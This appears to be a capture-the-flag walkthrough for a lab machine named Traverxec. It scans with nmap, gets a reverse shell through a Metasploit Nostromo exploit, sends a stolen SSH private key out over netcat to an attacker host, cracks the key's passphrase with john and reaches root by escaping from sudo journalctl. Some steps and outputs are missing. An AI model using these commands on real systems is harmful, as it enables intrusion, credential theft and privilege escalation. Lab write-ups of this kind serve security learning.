Finding out more about the webserver:
nmap -A 10.10.10.165 -o nmapresults.txt
We see that on port 80, there's a Nostromo service running. Let's see if there's an exploit for it.
Checking for an exploit:
So there are a few. Let's try and use the Metasploit one for the ease of use.
Trying to use the exploit:
msfconsole search nostromo use exploit/multi/http/nostromo_code_exec show options set RHOSTS 10.10.10.165 set LHOST 10.10.14.99 run
Nice we do get a shell. Let's improve it now.
To get a better shell:
python -c 'import pty; pty.spawn("/bin/bash")' export TERM=xterm
Finding the web server:
ls -al /var/ ls -al /var/nostromo
We see the conf directory, checking it:
cd /var/nostromo/conf ls -al
We see a hidden file,
Nice, now we have david's credentials. Poor david.
Now, let’s check the other file,
We can see that the homedirs should ring a bell in your head.
Can we go into david's home directory?
So, we can enter this directory, let's try to see what's in it.
It says permission denied, interesting, we can access the directory but not list the files.
ls -ld .
So, it seems that we have execute permissions in this directory but not read permissions, weird.
We know that there's a user.txt file in this directory, so let's check for it.
ls -l user.txt
We can see that the file exists, meaning if we know the name of the file, maybe we will be able to execute it.
ls -l public_www
Damn, so the file actually exists here. Lets copy it somewhere else.
mkdir /tmp/public_www ; cp public_www/* /tmp/public_www cd protected-file-area tar zxvf backup-ssh-identity-files.tgz
We get a backup of ssh files.
Now, in another terminal, in our attacking machine, let's set up a netcat listener to transfer the id_rsa file.
nc -nvlp 4444 > id_rsa
Now, back in the traverxec machine, let's send that file over:
nc 10.10.11.99 444 < id_rsa
Now, back in our own machine, to use that id_rsa file, we need its password. So, we'll have to crack it. For that, we will use ssh2john and then, use john to crack it.
updatedb locate ssh2john #finding ssh2john cp $(locate ssh2john) ~/HTB/Traverxec #copy it to your working directory python ssh2john.py id_rsa > id_rsa.hash #converting it cp $(locate rockyou.txt) ~/HTB/Traverxec #copying the rockyou.txt password file gunzip rockyou.txt.gz #unziping rockyou.txt john -wordlist=rockyou.txt id_rsa.hash #cracking the password with john
Now, it should give a password.
Now, let's try to ssh into the machine using the id_rsa file and the password.
Before we use the id_rsa file, let's change the permissions to 600.
ssh email@example.com -i id_rsa
Enter the password.
Nice, You are IN!
Now, for root, its pretty simple.
We can see that, in the last line, the sudo command is used. Let's check this script.
It doesn't ask for password, that's nice.
Let's try running the command that it runs:
sudo /usr/bin/journalctl -n5 -unostromo.service
Now, the command ran as sudo, we can probably take advantage of it.
Let's quit the terminal from full screen and make it a normal window and run that command again:
Now, journalctl opens with less, we can probably execute a command here and it should run as root as we have run the journalctl command as root with sudo.
Nice, now you should have a new bash shell and you should be root!